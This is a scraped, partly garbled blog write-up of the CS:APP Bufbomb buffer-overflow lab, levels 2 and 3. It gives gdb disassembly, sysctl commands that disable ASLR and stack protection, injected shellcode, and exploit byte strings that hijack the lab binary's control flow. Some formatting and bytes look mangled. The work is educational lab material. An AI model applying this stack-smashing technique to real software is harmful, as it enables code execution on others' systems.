Level 2:firecracker (30 points)
There is a bang function in Bufbomb,
int global_value = 0;void bang (int val) {if (Global_value = = cookie) {printf ("bang!: You set Global_value to 0x %x\n ", global_value); Validate (2);} else printf ("Misfire:global_value = 0x%x\n", global_value); Exit (0);}Similar to the previous two, requires calling Getbuf after returning to bang, and setting the global variable Global_value to its own cookie.
Starting with this, you need to lay out the executable shellcode in the stack's buf, and experiment with the discovery that the stack area of Ubuntu 12.04.5 in your machine is not executable (may sombody tell me?), because there is no way to close it. To install Fedora 7 in a virtual machine, turn off stack non-executable and randomization as follows, and proceed with the experiment.
Sysctl–w kernel.randomize_va_space=0
Sysctl–w kernel.exec-shield=0
Disassembly bang in gdb, get the address of the Global_value that stores the global variable is the 0x804aa60,bang function's entry address is 0x804898c
[[email protected] buflab]# gdb -q ./bufbombusing host libthread_db library "/lib/libthread_db.so.1". (GDB) disass bangdump of assembler code for function bang:0x0804898c <bang+0>: mov 0x804aa60,%eax ; assigning Global_value to% Eax0x08048991 <bang+5>: push %ebp0x08048992 <bang+6 >: mov %esp,%ebp0x08048994 <bang+8>: sub $0x8,%esp0x08048997 <bang+11>: cmp 0x804aa50,%eax ; Compare cookies with global_value0x0804899d <bang+17>: jne 0x80489c0 <bang+52>0x0804899f <bang+19>: add $0xfffffff8,%esp0x080489a2 <bang+22>: push %eax0x080489a3 <bang+23>: push $ 0x80493e00x080489a8 <bang+28>: call 0x8048748 <[email protected]>0x080489ad <bang+33>: add $0xfffffff4,% Esp0x080489b0 <bang+36>: push $0x20x080489b2 <bang+38> : call 0x8048c30 <validate>0x080489b7 <bang+43>: add $0x20,%esp0x080489ba <bang+46>: jmp 0x80489d1 <bang+69>0x080489bc <bang+48>: lea 0x0 (%esi),%esi0x080489c0 <bang+52>: add $ 0xfffffff8,%esp0x080489c3 <bang+55>: push %eax0x080489c4 <bang+56>: push $0x80494050x080489c9 <bang+61>: call 0x8048748 <[email protected]>0x080489ce <bang+66>: add $0x10,%esp0x080489d1 <bang+69>: add $0xfffffff4 ,%esp
Next, you need to lay out the global variables in buf and jump to shellcode in bang, and set the RET to BUF
650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/48/B7/wKiom1QLAY2j8X6ZAABTHg3MiQ0085.jpg "title=" Buflayout3.png "alt=" Wkiom1qlay2j8x6zaabthg3miq0085.jpg "/>
Get BUF in Debug
(GDB) disass getbufdump of assembler code for function getbuf:0 x08048a44 <getbuf+0>: push %ebp0x08048a45 <getbuf+1>: mov %esp,%ebp0x08048a47 <getbuf+3>: sub $0x18,%esp0x08048a4a <getbuf+6>: add $0xfffffff4,% Esp0x08048a4d <getbuf+9>: lea 0xfffffff4 (%EBP),%eax ;buf=% Ebp-120x08048a50 <getbuf+12>: push %eax0x08048a51 <getbuf+13>: call 0x8048b50 <Gets>0x08048a56 <getbuf+18>: mov $0x1,%eax0x08048a5b <getbuf+23>: mov %ebp,%esp0x08048a5d <getbuf+25>: pop %ebp0x08048a5e <getbuf+26>: ret end of assEmbler dump.
Set a breakpoint at address 0x08048a50 and run, knowing that BUF is 0XBFFFB0BC
(GDB) b *0x8048a50breakpoint 1 at 0x8048a50 (GDB) run-t heenstarting program:/root/desktop/buflab/bufbomb-t heenteam:he ENCOOKIE:0X5573B7CF (GDB) p $ebp +0xfffffff4$2 = (void *) 0XBFFFB0BC
Next Write Shellcode,
[[email protected] buflab]# cat EXPLOIT3_SHELLCODE.SPUSHL $0x804898c; Bang entry address Movl $0x5573b7cf,%eax movl%eax, 0x804aa60 ; set Cookieret
[[email protected] buflab]# gcc -c exploit3_shellcode.s[[email protected] Buflab]# objdump -d exploit3_shellcode.oexploit3_shellcode.o: file format elf32-i386Disassembly of section .text:00000000 <.text>: 0: 68 8c 89 04 08 push $0x804898c 5: b8 cf b7 73 55 mov $ 0x5573b7cf,%eax a: a3 60 aa 04 08 mov %eax,0x804aa60 f: c3 &nbSp;ret
Finally get shellcode 16 binary machine code, 16 bytes, just enough. So exploit string for Shellcode plus buf
[email protected] buflab]# cat exploit3.txt68 8c, B8 CF B7, A3 (aa) C3 BC B0 FF Bf[[email protected] buflab]# Cat exploit3.txt|. /sendstring|. /bufbomb-t heenteam:heencookie:0x5573b7cftype string:bang!: You set Global_value to 0x5573b7cfnice JOB!
Level 3:dynamite (40 points)
This requirement getbuf return to test, but cannot break the stack state maintained for the test function (the test function adds a stack state detection), and the return value of the call Getbuf after the Add test function is its own cookie. The test function is as follows
void test () { int val; volatile int local = 0xdeadbeef; val = getbuf (); /* check for corrupted stack */ if (Local != 0xdeadbeef) { printf ("Sabotaged! : the stack has been corrupted\n "); } else if (Val == cookie) { printf ("Boom !: getbuf returned 0x%x\n ", val); validate ( 3); } else { printf ("dud: getbuf returned 0x%x\n", val); }} This requires that our shellcode cannot break the stack state of the GETBUF call function test, either to return to test, or to restore the stack base address of the SFP as test, and to recover the stack base address in two ways: one in Shellcode, and two in exploit The appropriate position in the string is filled in with the SFP, where we have chosen the second method.
The disassembly test function obtains the normal return address of the GETBUF call.
(GDB) &NBSP;DISASS&NBSP;TESTDUMP&NBSP;OF&NBSP;ASSEMBLER&NBSP;CODE&NBSP;FOR&NBSP;FUNCTION&NBSP;TEST:0X080489DC <test+0>: push %ebp0x080489dd <test+1>: mov %esp,%ebp0x080489df <test+3>: sub $0x18,%esp0x080489e2 <test+6>: movl &NBSP;$0XDEADBEEF,0XFFFFFFFC (%EBP) 0x080489e9 <test+13>: call 0x8048a44 <getbuf>0x080489ee <test+18>: mov %eax ,%EDX&NBSP;;0X080489EE returns the address for Getbuf 0x080489f0 <test+20>: mov 0XFFFFFFFC (%EBP),%eax0x080489f3 <test+23>: cmp $0xdeadbeef, %eax0x080489f8 <test+28>: je 0x8048a10 <test+ 52>0x080489fa <test+30>: add $0xfffffff4,%esp0x080489fd <test+33>: push $0x80494400x08048a02 <test+38>: call 0x8048748 <[email protected]>0x08048a07 <test+43>: jmp 0x8048a40 <test+100>0x08048a09 <test+45>: lea 0x0 (%esi),%esi0x08048a10 <test+52>: cmp 0x804aa50,%edx0x08048a16 <test+58>: jne 0x8048a32 &NBSP;<TEST+86>0X08048A18&NBSP;<TEST+60>:&NBSP;&NBSP;&NBSP;ADD&NBSP;&NBSP;&NBSP;&NBSP;$0XFFFFFFF8, %esp0x08048a1b <test+63>: push %edx0x08048a1c <test+64 >: push $0x804946a0x08048a21 <test+69>: call 0x8048748 <[email protected]>0x08048a26 <test+74>: add $0xfffffff4,%esp0x08048a29 <test+77>: push $ 0X3---type <return> to continue, or q <return> to quit---
In 0X80489DF, get the value of its stack base address as 0xbfffb0e8
(GDB) b *0x80489dfbreakpoint 2 at 0X80489DF (GDB) run-t heenthe program being debugged have been started already. Start it from the beginning? (Y or N) ystarting program:/root/desktop/buflab/bufbomb-t heenteam:heencookie:0x5573b7cfbreakpoint 2, 0x080489df in Te St () (GDB) p $EBP $ = (void *) 0xbfffb0e8
Write Shellcode to get its 16-binary machine code
[[Email protected] buflab]# cat exploit4_shellcode.smovl $0x5573b7cf, %eaxpush $0x80489eeret[[email protected] buflab]# gcc -c exploit4_shellcode.s[[email protected] buflab]# objdump -d exploit4_shellcode.oexploit4_shellcode.o: file format elf32-i386Disassembly of section .text:00000000 <.text>: 0: b8 cf b7 73 55 mov $0x5573b7cf,%eax ; set Getbuf return value to cookie 5: 68 ee 89 04 08 push $0x80489ee ; getbuf return address stack a: c3 &nbsP;ret
Synthesizing the preceding information, get exploit string, where byte ff can be any byte (except carriage return 0a and null character 00)
[[email protected] buflab]# cat exploit4.txt B8 CF B7----ee--C3 ff E8 b0 FF BF BC B0 FF BF
[email protected] buflab]# cat exploit4.txt|. /sendstring|. /bufbomb-t heenteam:heencookie:0x5573b7cftype string:boom!: Getbuf returned 0x5573b7cfnice JOB!
Csapp Buffer Overflow Experiment Record (ii)
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
